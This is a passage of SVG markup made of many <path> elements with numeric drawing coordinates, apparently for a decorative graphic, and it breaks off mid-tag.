<path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path 